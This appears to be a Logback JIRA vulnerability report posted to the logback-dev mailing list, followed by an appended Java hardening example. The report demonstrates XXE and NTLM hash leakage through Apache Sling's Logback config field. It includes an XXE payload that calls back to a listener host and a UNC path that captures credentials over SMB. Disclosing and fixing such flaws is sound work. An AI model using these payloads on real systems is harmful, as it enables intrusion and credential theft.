shuiboye created LOGBACK-1465:
---------------------------------

             Summary: xxe and Information disclosure vulnerabilities in Logback
                 Key: LOGBACK-1465
                 URL: https://jira.qos.ch/browse/LOGBACK-1465
             Project: logback
          Issue Type: Bug
          Components: logback-core
         Environment: I tested Apache Sling latest version 11 integrating Logback 
running on a Windows system 
            Reporter: shuiboye
            Assignee: Logback dev list
            Priority: Critical
         Attachments: image-2019-05-09-15-41-28-419.png, 
image-2019-05-09-15-41-45-829.png, image-2019-05-09-15-43-09-668.png, 
image-2019-05-09-15-43-25-103.png

Hi, I found XXE and information disclosure vulnerabilities in Logback when 
testing Apache Sling latest version 11 integrating Logback.

First I log in to Sling as an admin.
*XXE*
The vulnerable URL is 
[http://127.0.0.1:8080/system/console/configMgr/org.apache.sling.commons.log.LogManager].
In the "Logback Config File" field, I input "\\192.168.0.102\c$\xxe.xml" as 
shown below.
!image-2019-05-09-15-43-09-668.png!
The content of the xxe.xml under the c:\ directory on the server 192.168.0.102 is 
{code:xml}
<?xml version="1.0"?>
<!DOCTYPE r [
<!ENTITY % sp SYSTEM "http://192.168.0.102:8090/sling">
%sp;
]>
{code}
 
After clicking "save", the netcat running on the server 192.168.0.102 and 
listening on port 8090 receives the request as shown below.
!image-2019-05-09-15-43-25-103.png!
 
*Information disclosure (Windows username and NTLM password hash)*
The vulnerable URL is 
[http://127.0.0.1:8080/system/console/configMgr/org.apache.sling.commons.log.LogManager].
To ensure that the "Logback Config File" can result in the server's Windows 
username and NTLM password hash being leaked to remote attackers through SMB, I 
use another machine to visit the vulnerable page, whose URL is also 
[http://192.168.0.102:8080/system/console/configMgr/org.apache.sling.commons.log.LogManager].
In the "Logback Config File" field, I input "\\192.168.9.128\test". The IP 
192.168.9.128 is another machine used to capture SMB.
!image-2019-05-09-15-41-28-419.png!
After clicking "save", the machine whose IP is 192.168.9.128 successfully 
captures the Windows username and NTLM password hash through SMB.
 
!image-2019-05-09-15-41-45-829.png!



--
This message was sent by Atlassian JIRA
(v7.3.1#73012)
_______________________________________________
logback-dev mailing list
logback-dev@qos.ch
http://mailman.qos.ch/mailman/listinfo/logback-dev

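As an added illustration (not Logback's or Sling's own code) of the two defender-side checks this report points at: refusing UNC paths such as `\\host\share` in a user-supplied config path, so no SMB authentication is ever sent off the box, and parsing the config with DOCTYPE and external entities disabled, so a file shaped like the xxe.xml above fetches nothing. The class and method names (`SafeConfigLoad`, `isLocalPath`, `parseAccepts`) and the sample host `attacker.example` are assumptions for the example.

```java
import java.io.ByteArrayInputStream;
import java.io.InputStream;
import java.nio.charset.StandardCharsets;
import javax.xml.parsers.SAXParser;
import javax.xml.parsers.SAXParserFactory;
import org.xml.sax.SAXException;
import org.xml.sax.helpers.DefaultHandler;

// Added example, not Logback or Sling code: the two checks a defender would put
// in front of a user-supplied "Logback Config File" setting.
public final class SafeConfigLoad {

    // Accept only plain local file paths: no UNC/SMB paths (\\host\share or
    // //host/share) and no URL schemes (http:, file:, jar:, ...). A Windows
    // drive letter such as C:\ is a single letter before the colon and still passes.
    static boolean isLocalPath(String path) {
        String p = path.trim();
        if (p.startsWith("\\\\") || p.startsWith("//")) return false;
        return !p.matches("(?i)^[a-z][a-z0-9+.-]+:.*");
    }

    // SAX parser with DTD processing off, so a DOCTYPE is rejected before any
    // SYSTEM entity (the %sp; in the report's xxe.xml) can be resolved.
    static SAXParser hardenedParser() throws Exception {
        SAXParserFactory f = SAXParserFactory.newInstance();
        f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        f.setFeature("http://xml.org/sax/features/external-general-entities", false);
        f.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        f.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        f.setXIncludeAware(false);
        return f.newSAXParser();
    }

    // true if the hardened parser accepts the document, false if it refuses it.
    static boolean parseAccepts(String xml) throws Exception {
        try (InputStream in = new ByteArrayInputStream(xml.getBytes(StandardCharsets.UTF_8))) {
            hardenedParser().parse(in, new DefaultHandler());
            return true;
        } catch (SAXException e) {
            return false;   // DOCTYPE disallowed: nothing was fetched
        }
    }

    public static void main(String[] args) throws Exception {
        // Constructed samples; attacker.example stands in for the listener host in the report.
        String xxe = "<?xml version=\"1.0\"?>\n<!DOCTYPE r [\n"
                + "<!ENTITY % sp SYSTEM \"http://attacker.example:8090/sling\">\n%sp;\n]>\n<r/>";
        String benign = "<configuration><root level=\"INFO\"/></configuration>";
        System.out.println("UNC path rejected:      " + !isLocalPath("\\\\192.168.9.128\\test"));
        System.out.println("local path accepted:    " + isLocalPath("C:\\logback.xml"));
        System.out.println("xxe.xml rejected:       " + !parseAccepts(xxe));
        System.out.println("benign config accepted: " + parseAccepts(benign));
    }
}
```

Run with `javac SafeConfigLoad.java && java SafeConfigLoad`; all four lines should print `true`.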